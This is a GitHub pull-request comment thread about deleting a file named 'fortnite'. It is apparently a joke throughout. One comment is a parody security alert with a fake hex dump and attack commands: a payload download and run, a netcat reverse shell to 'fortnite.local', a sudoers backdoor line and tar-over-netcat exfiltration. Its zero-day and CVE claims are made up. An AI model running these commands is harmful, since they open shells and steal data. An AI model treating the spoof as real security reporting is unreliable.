Delete fortnite
titaniumnetwork-dev/Ultraviolet pull request #141
Opened 2024-05-09 05:06 UTC by bruhwhyamisobad

2024-05-09 12:11 UTC, 3kh0 commented
SAVE FORTNIGHT

2024-05-09 12:30 UTC, Riftriot commented
This makes the build fail, and it's outside of the project scope. Do you even use the software?

2024-05-09 18:50 UTC, e9x commented
+1, This can't be merged.

2024-05-10 01:54 UTC, kxtzownsu commented
tried running this commit and my entire firmware got nuked, did you even test this?

2024-05-18 02:27 UTC, e9x commented
I think we can meet somewhere in the middle. I have a proposed solution that will work allow builds to continue working, while adding more features to the fortnite file. Here's my proposed replacement for the fortnite file:
![fortnite](https://github.com/titaniumnetwork-dev/Ultraviolet/assets/76465669/104096c2-739f-4f13-bf39-81256c228a01)

2024-05-18 02:50 UTC, ProgrammerIn-wonderland commented
I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

2024-05-18 02:56 UTC, e9x commented
> I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

2024-05-20 00:59 UTC, 3kh0 commented
> > I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token
> 
> Are you sure your workstation wasn't compromised? Can you provide checksums of the file?
> 
> https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

Cool but it is entirely possible that this file is exploiting a zero-day. Additional testing is required

2024-05-20 01:18 UTC, builtbyvys commented
### Security Alert: Zero-Day Exploit Detected in 'fortnite'

#### Overview
The Percury Mercshopians have identified a critical zero-day exploit embedded in a file named 'fortnite'. This malicious file is capable of executing unauthorized remote code, compromising sensitive data, and propagating across networked systems undetected. The exploit leverages sophisticated obfuscation techniques, making it exceptionally difficult to detect and mitigate using standard antivirus solutions.

#### Technical Analysis
The 'fortnite' file exhibits behavior characteristic of advanced persistent threats (APT), including but not limited to memory corruption, buffer overflow attacks, and privilege escalation. Initial analysis indicates that the file is programmed to establish a covert command and control (C&C) channel with external servers, allowing attackers to issue commands and exfiltrate data.

Below are excerpts from the octet dump and relevant commands observed during the reverse engineering process:

##### Octet Dump
```
0000: 46 4f 52 54 4e 49 54 45 20 4d 41 4c 49 43 49 4f | FORTNITE MALICIO
0010: 55 53 20 46 49 4c 45 20 2d 20 5a 45 52 4f 2d 44 | US FILE - ZERO-D
0020: 41 59 20 45 58 50 4c 4f 49 54 00 90 4e 3b 6f 21 | AY EXPLOIT..N;o!
0030: 8f 33 01 67 44 89 3a c0 47 5a 99 45 f0 c3 33 12 | .3.gD.:.GZ.E..3.
0040: 41 23 59 74 7b a4 f3 56 9a d3 78 43 c5 87 e1 98 | A#Yt{..V..xC....
0050: 9f 34 21 67 8b e0 77 44 2c 90 5e 11 4a 34 6d 22 | .4!g..wD,^J4m"
0060: 39 b4 5a 23 11 4d 59 98 4f 32 90 f5 21 48 77 69 | 9.Z#.MY.O2..!Hwi
```

##### Observed Commands
- **Initial Payload Deployment**:  
  ```shell
  wget https://store.epicgames.com/en-US/p/fortnite/payload -O /tmp/.fortnite_payload
  chmod +x /tmp/.fortnite_payload
  /tmp/.fortnite_payload &
  ```

- **Establishing C&C Communication**:  
  ```shell
  nc -e /bin/bash fortnite.local 4444
  ```

- **Privilege Escalation**:  
  ```shell
  echo "fortnite ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
  sudo -u fortnite /bin/bash
  ```

- **Data Exfiltration**:  
  ```shell
  tar czf - /var/www/html | nc fortnite.local 5555
  ```

#### Mitigation Steps
1. **Immediate Isolation**: Disconnect the affected systems from the network to prevent further spread.
2. **File Removal**: Manually delete the 'fortnite' file and any associated payloads:
   ```shell
   rm -f /tmp/.fortnite_payload
   rm -f /path/to/fortnite
   ```
3. **Network Monitoring**: Deploy enhanced network monitoring to detect any attempts to re-establish C&C communication.
4. **Patch Deployment**: Apply all relevant security patches and updates to prevent re-exploitation.
5. **System Audit**: Conduct a thorough system audit to identify and remediate any unauthorized changes or data breaches.

#### Conclusion
The 'fortnite' zero-day exploit represents a significant threat to organizational security. Immediate and comprehensive response measures are essential to mitigate the impact and secure network integrity. Continued vigilance and proactive security practices are recommended to defend against such advanced threats.

For further assistance and detailed incident response, please contact our cybersecurity team at security@percurymerc.shop

2024-05-20 01:51 UTC, 3kh0 commented
@builtbyvys Thank you for this, I have forwarded this to the people at Mitre to get a CVE made for it. Will update on the status of this

![image](https://github.com/titaniumnetwork-dev/Ultraviolet/assets/58097612/f46fea93-f167-441b-b88e-bf00a2639f5a)

2024-05-20 02:14 UTC, Cattn commented
Looking into this...

2024-05-20 02:28 UTC, Riftriot requested changes
Please remove the IP logger and discord token stealer before I can proceed with reviewing the pull request

2024-05-20 02:29 UTC, e9x commented
CC: @skibiditoilet510

2024-05-20 02:35 UTC, e9x commented
Please review @Riftriot @ProgrammerIn-wonderland

2024-05-20 02:35 UTC, e9x approved these changes
Malware fixed

2024-05-20 13:38 UTC, Riftriot requested changes
After a close examination of the file, it is shown that fortnite.jpg is vulnerable to the Colonthree CVE. Please update it as it is patched in the latest versions
![image](https://github.com/titaniumnetwork-dev/Ultraviolet/assets/117926989/230c897f-27e1-457b-bf32-19cc8e3f017f)

2024-05-20 19:05 UTC, merged

2024-05-21 01:09 UTC, 3kh0 commented
@Riftriot will have to work on fixing this in a future pull, I would be happy to help out

2024-05-21 01:33 UTC, Cattn commented
This is serious. This should be reverted immediately.

2024-05-21 01:34 UTC, proudparrot2 commented
I am running it on my machine now, and see almost every unit test is failing. Did you even run them before merging this pull request?

2024-05-21 01:44 UTC, Riftriot commented
Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

2024-05-21 01:58 UTC, proudparrot2 commented
This is not unnecessary panic. This is a case of a reckless contributor who merged a pull request that makes the majority of unit tests fail, as well as the build. Please consider your priorities when replying with comments such as these.

2024-05-21 02:08 UTC, Cattn commented
> Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

This careless, and baseless sentiment will not be tolerated here. Delete this comment now, and stop downplaying serious threats. This is life ending.

2024-05-21 16:19 UTC, 3kh0 commented
![image](https://github.com/titaniumnetwork-dev/Ultraviolet/assets/58097612/a2fbe7fd-c1f4-44bf-88af-124af5c47456)

2024-05-21 16:28 UTC, Riftriot commented
Hey proudparrot2 and Cattn, I appreciate your feedback and understand the concerns you're raising. My intention wasn't to downplay the severity of the issue but to emphasize the importance of measured responses. Every vulnerability, including the Colonthree CVE, deserves our full attention and swift action to mitigate risks effectively.

However, I believe that creating a sense of balance and not causing unnecessary panic is crucial for our collective progress. We need to address the CVE with the urgency it demands while also providing clear, constructive solutions and ensuring our community remains calm and focused.

Let's work together to fix the build and unit test failures as a priority and develop a robust plan to prevent similar issues in the future. Collaboration and clear communication will help us navigate this challenge more effectively. 💻🔒 #cybersecurity #github #CVE

2024-05-21 21:41 UTC, Cattn commented
I agree, and hope the language used in your previous message is never
repeated, as downplaying something of such high priority will have
dangerous implications for future security.

On Tue, May 21, 2024 at 12:28 PM rift ***@***.***> wrote:

> Hey proudparrot2 and Cattn, I appreciate your feedback and understand the
> concerns you're raising. My intention wasn't to downplay the severity of
> the issue but to emphasize the importance of measured responses. Every
> vulnerability, including the Colonthree CVE, deserves our full attention
> and swift action to mitigate risks effectively.
>
> However, I believe that creating a sense of balance and not causing
> unnecessary panic is crucial for our collective progress. We need to
> address the CVE with the urgency it demands while also providing clear,
> constructive solutions and ensuring our community remains calm and focused.
>
> Let's work together to fix the build and unit test failures as a priority
> and develop a robust plan to prevent similar issues in the future.
> Collaboration and clear communication will help us navigate this challenge
> more effectively. 💻🔒 #cybersecurity #github #CVE
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/titaniumnetwork-dev/Ultraviolet/pull/141#issuecomment-2123005799>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/AQSFVQRUR5OV36OZSYFG3RTZDNY4VAVCNFSM6AAAAABHOFFIPGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCMRTGAYDKNZZHE>
> .
> You are receiving this because you commented.Message ID:
> ***@***.***>
>

2024-05-22 06:46 UTC, e9x commented
> "vely. 💻🔒 #cybersecurity #githu"

@Riftriot I see. For reference: ![](https://github.com/titaniumnetwork-dev/Ultraviolet/assets/76465669/ac2a3c2a-62c8-45d6-9dcd-c045b3d36f5f)

2024-05-23 03:07 UTC, Riftriot commented
e9x, we maintain a professional standard in this community, and your recent post is far from meeting it. Let's keep the discourse focused and respectful. Please refrain from such inappropriate content in the future. Let's work together to uphold the standards we expect from all members. 💻🔒 #cybersecurity #github #CVE

2024-11-02 21:32 UTC, liujustin604 commented
lol